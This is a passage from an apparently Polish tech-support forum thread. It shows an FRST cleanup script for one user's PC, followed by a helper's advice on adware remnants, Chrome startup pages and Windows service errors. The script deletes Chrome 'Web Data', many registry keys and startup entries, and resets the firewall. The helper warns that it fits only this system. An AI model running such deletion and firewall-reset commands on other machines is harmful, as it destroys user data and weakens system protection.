Menu\Programs\RAR Password Recovery C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sierra C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XTCS Counter-Strike 1.6 Final Release C:\Users\Gość\AppData\Local\Microsoft\Windows\GameExplorer\{F86210CB-EE92-4C63-8D4D-A266B34FC82B} C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\XTCS Counter-Strike 1.6 Final Release.lnk C:\Users\Gość\Desktop\XTCS Counter-Strike 1.6 Final Release.lnk C:\Users\Maciej\AppData\Local\*.html C:\Users\Maciej\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Maciej\AppData\Local\Google\Chrome\User Data\Default\Web Data C:\Users\Maciej\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\XTCS Counter-Strike 1.6 Final Release.lnk C:\Users\Maciej\AppData\Roaming\Microsoft\Office\Niedawny\*.LNK C:\Users\UpdatusUser\Desktop\*.lnk C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\*.lnk C:\Windows\pss\Secunia PSI Tray.lnk.CommonStartup CMD: netsh advfirewall reset Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Secunia PSI Tray.lnk" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AVG_TRAY" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\FixMyRegistry" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KiesHelper" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KiesPDLR" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KiesTrayAgent" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\OrderReminder" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\QPrinter 2.0 monitor" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Samsung_AppInst" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SDTray" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SpeedUpMyComputer" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\vProt" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się które objawy nadal mają miejsce.

Temat przenoszę do działu Windows. To nie jest problem infekcji. Tylko minimalne odpadki adware widać, ale to absolutnie nie ma związku z objawami. Drobna korekta w Google Chrome: - Zresetuj synchronizację (o ile włączona): KLIK. - Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń wszystkie wystąpienia mystartsearch.com i oursurfing.com, przestaw na "Otwórz stronę nowej karty". Z raportów nic kompletnie nie wynika. Ewentualnie zwracają uwagę te błędy: Dziennik System: ============= Error: (11/13/2015 09:09:14 PM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: Menedżer sterowania usługami próbował podjąć akcję korekcyjną (Uruchom usługę ponownie) po nieoczekiwanym zakończeniu usługi Magazyn danych użytkownika_Session1, ale ta akcja nie powiodła się przy następującym błędzie: %%1056. Error: (11/13/2015 09:09:09 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Magazyn danych użytkownika_Session1. Error: (11/13/2015 09:09:09 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Magazyn danych użytkownika_Session1. Error: (11/13/2015 09:09:09 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Magazyn danych użytkownika_Session1. Error: (11/13/2015 09:09:08 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Magazyn danych użytkownika_Session1. Co to znaczy "uruchamia się dopiero za drugim razem" - czy stoi na jakimś ekranie długo (i jakim), a może tylko czarny ekran lub inne objawy? Duże zużycie RAM: których procesów tyczy? Otwórz Menedżer zadań Windows 10 i zrób zrzuty ekranu z kart Procesy i Szczegóły, tak by było widać dobrze wszystkie statystyki.